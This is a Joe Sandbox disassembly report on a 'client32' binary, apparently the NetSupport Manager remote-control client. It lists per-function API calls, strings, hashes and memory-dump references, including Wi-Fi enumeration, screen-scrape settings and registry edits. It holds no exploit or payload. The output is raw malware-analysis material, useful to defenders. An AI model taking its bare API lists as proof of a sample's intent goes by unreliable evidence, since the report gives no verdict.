Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Timetime$_memmove
String ID: %d pieces (max pieces=%d)
API String ID: 2401759512-3870555317
Opcode ID: c50ae0e825ba3d0f31e67cb12ec45c1f9d68dcaef5e58634174116b9bf7a98cf
Instruction ID: 3d637e7a86c251b427e350d01147bf817fd72bdde0534e32382a5814f5112561
Opcode Fuzzy Hash: c50ae0e825ba3d0f31e67cb12ec45c1f9d68dcaef5e58634174116b9bf7a98cf
Instruction Fuzzy Hash: C5F14D75D006099FDB04DFA8D980ADEBBF5FF88318F158969E819A7340EB34A941CF91

Function 1112D7A0 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 248windowtimeCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 1112D7BA
GetDC.USER32(?), ref: 1112D7EC
SelectObject.GDI32(00000000,?), ref: 1112D7FC
GetTextExtentPoint32A.GDI32(00000000,?,00000000,00000002), ref: 1112D8A0
SelectObject.GDI32(00000000,000003E8), ref: 1112D9A5
ReleaseDC.USER32(?,00000000), ref: 1112D9CD
SystemParametersInfoA.USER32(00000030,00000000,11182200,00000000), ref: 1112D9DD
SetWindowPos.USER32(00000000,000000FF,-0000000F,-0000000F,-0000000A,-00000009,00000040,?,?,?,000003E8,00000002,TCP Retries), ref: 1112DA2F
GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 1112D906

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

SetTimer.USER32(?,00000001,00000000,00000000), ref: 1112DA67

Strings

m_hWnd, xrefs: 1112D7DB, 1112D9BB, 1112DA0A, 1112DA4E
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1112D7D6, 1112D9B6, 1112DA05, 1112DA49
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1112D853, 1112D87E, 1112D8B9, 1112D8E4
IsA(), xrefs: 1112D858, 1112D883, 1112D8BE, 1112D8E9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtentObjectPoint32SelectTextWindow$ErrorExitInfoLastMessageParametersProcessReleaseSystemTimerVisiblewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 1475044039-3129562787
Opcode ID: 2609c171a1903106328200cf008d87556c1b9f029330b9767a5fea5ce1dccd09
Instruction ID: 594014a1ddc5c7ee27caa9ffbdf23d2d6d19d72861e267c9d0e0215120db3a2f
Opcode Fuzzy Hash: 2609c171a1903106328200cf008d87556c1b9f029330b9767a5fea5ce1dccd09
Instruction Fuzzy Hash: EEA17AB9A00606AFCB15CF65D984E9EF7F1BF48314FA08568E959A7781E730B940CF60

Function 110F9620 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110F964E
EnterCriticalSection.KERNEL32(111DBDA4), ref: 110F9657
GetTickCount.KERNEL32 ref: 110F965D
GetTickCount.KERNEL32 ref: 110F96B0
LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110F96B9
GetTickCount.KERNEL32 ref: 110F96EA
LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110F96F3
EnterCriticalSection.KERNEL32(111DBDA4), ref: 110F971C
LeaveCriticalSection.KERNEL32(111DBDA4,00000000,?,00000000), ref: 110F97E3

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

Part of subcall function 110E5C50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,110F9787,?), ref: 110E5C7B

Strings

e:\nsmsrc\nsm\1201\1201f2\client32\platnt.cpp, xrefs: 110F969E, 110F9753, 110F9799
psi, xrefs: 110F96A3, 110F9758, 110F979E
info. new psi(%d) = %x, xrefs: 110F97D1
Warning. took %d ms to get simap lock, xrefs: 110F9669
Warning. simap lock held for %d ms, xrefs: 110F96C9, 110F9703

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1201\1201f2\client32\platnt.cpp$info. new psi(%d) = %x$psi
API String ID: 1574099134-2778890452
Opcode ID: f5f3269683871b0c87e91eafc9f17311406ea81333dff44d105f7e04005244ec
Instruction ID: b4577e42a59a3743beb29bf4ff123ba11c5e9efe7befee2d7f5d2ccaaf1aa78d
Opcode Fuzzy Hash: f5f3269683871b0c87e91eafc9f17311406ea81333dff44d105f7e04005244ec
Instruction Fuzzy Hash: A241D676E013266FDB00DFA5ED85ADEFBA4BB5565CF004535F916E7200F6306904CBA2

Function 110457B0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137processwindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11045836
WinExec.KERNEL32(?,00000001), ref: 110458AF
CloseHandle.KERNEL32(?), ref: 110458D1
CloseHandle.KERNEL32(?), ref: 110458DA
IsWindow.USER32(00000000), ref: 110458EC
GetLastError.KERNEL32 ref: 11045917
IsWindow.USER32(00000000), ref: 11045949
PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1104595A

Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B

Strings

PCIVideoSlave32, xrefs: 110458F6
pcivideovi.exe /X, xrefs: 110457FD
ShowVideo, xrefs: 11045841
D, xrefs: 11045846
Failed to load player (%d), xrefs: 1104591E
DoShowVideo - could not find %s window, xrefs: 110458FB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePathWindow$ErrorExecFileLastMessageModuleNamePost_memset
String ID: D$DoShowVideo - could not find %s window$Failed to load player (%d)$PCIVideoSlave32$ShowVideo$pcivideovi.exe /X
API String ID: 2703108677-1914331637
Opcode ID: 663dccee32d0e786faae837599a30831d1b500c9d939b8a56e5f3d5aea0eda79
Instruction ID: e696fddc6ff2d01e6b9a77bd21ef717381eee885786c7b130f534b4739ca8f54
Opcode Fuzzy Hash: 663dccee32d0e786faae837599a30831d1b500c9d939b8a56e5f3d5aea0eda79
Instruction Fuzzy Hash: AA410579A002199FDB10DF64DC85FDDF7A8AF45708F5080E4E9099B284EF71AA448F95

Function 11149650 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11053767), ref: 1114969B
GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 111496B4
GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 111496C4
GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 111496D4
GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111496E4
GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111496F4
std::exception::exception.LIBCMT ref: 1114970D
__CxxThrowException@8.LIBCMT ref: 11149722

Strings

WlanOpenHandle, xrefs: 111496AE
WlanFreeMemory, xrefs: 111496EE
WlanEnumInterfaces, xrefs: 111496CE
wlanapi.dll, xrefs: 11149693
WlanCloseHandle, xrefs: 111496BE
WlanGetAvailableNetworkList, xrefs: 111496DE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
API String ID: 2439742961-1736626566
Opcode ID: 9adaa3d449b7c9eb81f533e138a9463de5761ab687df245a904e008a64a9d256
Instruction ID: bcae241f0b89d2f06fcf8cb080041f423678daaa4ec4e3757a1493b790fb90c0
Opcode Fuzzy Hash: 9adaa3d449b7c9eb81f533e138a9463de5761ab687df245a904e008a64a9d256
Instruction Fuzzy Hash: 4921D5B9A017199FC750DFA9CC84E9BFBE9EF58604710896EE86AD3601F770E440CB90

Function 1102F5C0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,2F623E72), ref: 1102F5FA

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

EnumWindows.USER32(Function_0002E710,00000001), ref: 1102F6D2
EnumWindows.USER32(Function_0002E710,00000000), ref: 1102F72C
Sleep.KERNEL32(00000014), ref: 1102F73C
Sleep.KERNEL32(?), ref: 1102F773

Part of subcall function 11026B80: _memset.LIBCMT ref: 11026BB5
Part of subcall function 11026B80: wsprintfA.USER32 ref: 11026BEA
Part of subcall function 11026B80: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11026C2F
Part of subcall function 11026B80: GetExitCodeProcess.KERNEL32(?,?), ref: 11026C43
Part of subcall function 11026B80: CloseHandle.KERNEL32(?,?), ref: 11026C75
Part of subcall function 11026B80: CloseHandle.KERNEL32(?), ref: 11026C7E

Sleep.KERNEL32(0000000A), ref: 1102F78B
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 1102F847

Strings

close new explorer wnd x%x, xrefs: 1102F80F
Client, xrefs: 1102F617
*ExitMetroDelay, xrefs: 1102F612
\Explorer.exe, xrefs: 1102F63A
No new explorer wnd, xrefs: 1102F753
"%sNSMExec.exe" %s, xrefs: 1102F6E5

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
API String ID: 3887438110-1852639040
Opcode ID: 6e945e8ad443019e654b15b67e049bf7049c8843d49cb251ac38597ff630e1b7
Instruction ID: fccb9083fa6e288bb695f73796274cd7590cfa02bb95d1b93bba247e7dcc7a00
Opcode Fuzzy Hash: 6e945e8ad443019e654b15b67e049bf7049c8843d49cb251ac38597ff630e1b7
Instruction Fuzzy Hash: 1791AC75E0022A9FDB54CF64CC80BEEF7A5AF49358F5441ADD9099B240EB70AE41CB92

Function 1104F2D8 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 235COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1104F34E
wsprintfA.USER32 ref: 1104F367
_memset.LIBCMT ref: 1104F3BD
GetTickCount.KERNEL32 ref: 1104F438

Strings

NameLookup, xrefs: 1104F42A, 1104F78C
Channel, xrefs: 1104F3D2
_License, xrefs: 1104F471
Client, xrefs: 1104F3D7
serial_no, xrefs: 1104F46C
Delay, xrefs: 1104F425, 1104F787
%s|%s, xrefs: 1104F35B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick_malloc_memsetwsprintf
String ID: %s|%s$Channel$Client$Delay$NameLookup$_License$serial_no
API String ID: 476529905-1572471466
Opcode ID: f3d62a7524c7ad22734ef233d6bc0ca378736658c2f5e93e5391ab5d48716f84
Instruction ID: 20ddcee4d1bc7712217354b168d0bfd2dc4cde43965b802a14daddc5ad8be1dc
Opcode Fuzzy Hash: f3d62a7524c7ad22734ef233d6bc0ca378736658c2f5e93e5391ab5d48716f84
Instruction Fuzzy Hash: 2C8148B5E002564FDB10CB78CC88BEEBBF5AF45318F1482E9D859D7281EA31E941CB91

Function 11109150 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 211registryCOMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 11109194
_free.LIBCMT ref: 11109178

Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D

RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Cursors,00000000,0002001F,?,00000000,?,?), ref: 111091D7
RegCloseKey.ADVAPI32(?,?,?), ref: 11109315
_free.LIBCMT ref: 11109323
SystemParametersInfoA.USER32(00000057,00000000,00000000,00000000), ref: 1110933F
_malloc.LIBCMT ref: 1110937C

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

RegSetValueExA.ADVAPI32(?,?,00000000,?,11182200,00000001), ref: 111093B8
RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,?,?,?,?,?), ref: 111093F2
_free.LIBCMT ref: 11109403

Strings

Control Panel\Cursors, xrefs: 111091BB
.ani, xrefs: 111092C1

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$HeapValue$AllocateCloseErrorFreeInfoLastOpenParametersSystem_calloc_malloc
String ID: .ani$Control Panel\Cursors
API String ID: 918258518-1319880064
Opcode ID: 7ebe694ef74f96ba837efbfca47eec6e3261091385bba646e78e5b30a3557b1d
Instruction ID: 70085561973be509b33fca5fb73cb0cd02be037bb32c9e1d27dc1538c435e597
Opcode Fuzzy Hash: 7ebe694ef74f96ba837efbfca47eec6e3261091385bba646e78e5b30a3557b1d
Instruction Fuzzy Hash: 0F8192B1E0026D9FDB25CF24CD95BD9F7B5AB09308F1045E9E90DAB280E7709A84CF91

Function 110AB110 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 206COMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

EnterCriticalSection.KERNEL32(000000FF,View,limitcolorbits,00000000,00000000,2F623E72,?,?,00000000), ref: 110AB17D
UnionRect.USER32(?,?,?), ref: 110AB210
LeaveCriticalSection.KERNEL32(?), ref: 110AB36E

Strings

ScrapeSkipDelay, xrefs: 110AB265
Client, xrefs: 110AB1C8, 110AB26A, 110AB287, 110AB2A4, 110AB2C1, 110AB2F4
ScrapeBusyDelay, xrefs: 110AB282
limitcolorbits, xrefs: 110AB142, 110AB1C3
$, xrefs: 110AB308
View, xrefs: 110AB14F
ScrapeBandwidth, xrefs: 110AB2BC
ScrapeBandwidthPeriod, xrefs: 110AB2EF
ScrapeNotBusyDelay, xrefs: 110AB29F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
String ID: $$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$limitcolorbits
API String ID: 3518726166-1273412197
Opcode ID: e3c3c332c56030bb27a1236354f52011bf6cdcdea50863d5a731ae696520c0ea
Instruction ID: a8670cac8e9aec6debf5f4417f5d7e546ceba16e81d257d7b5c14f0770091148
Opcode Fuzzy Hash: e3c3c332c56030bb27a1236354f52011bf6cdcdea50863d5a731ae696520c0ea
Instruction Fuzzy Hash: 08812774E016199FDB44CFA9D980BEDFBF5BB48304F10856AE915AB380DB30A941CF94

Function 1103D620 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000472), ref: 1103D64F

Part of subcall function 1114E020: SetPropA.USER32(00000000,00000000,00000000), ref: 1114E03E
Part of subcall function 1114E020: SetWindowLongA.USER32(00000000,000000FC,1114DA30), ref: 1114E04F

wsprintfA.USER32 ref: 1103D6C9
GetSystemMenu.USER32(?,00000000), ref: 1103D6EE
EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103D6FC
SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103D740
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103D76F
MessageBeep.USER32(00000000), ref: 1103D773

Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B

Strings

BlockedAppFile, xrefs: 1103D6A0
m_hWnd, xrefs: 1103D71D, 1103D752
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1103D718, 1103D74D
Client, xrefs: 1103D6A5
%sblockapp.jpg, xrefs: 1103D6C3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$FolderItemMenuPath$BeepEnableFileLongMessageModuleNamePropSystemwsprintf
String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2765991881-2812993818
Opcode ID: df56dbca2d5c7331c01273a47a7a69ca0b246c7bc76a6fcbc4a787e55cec9ec9
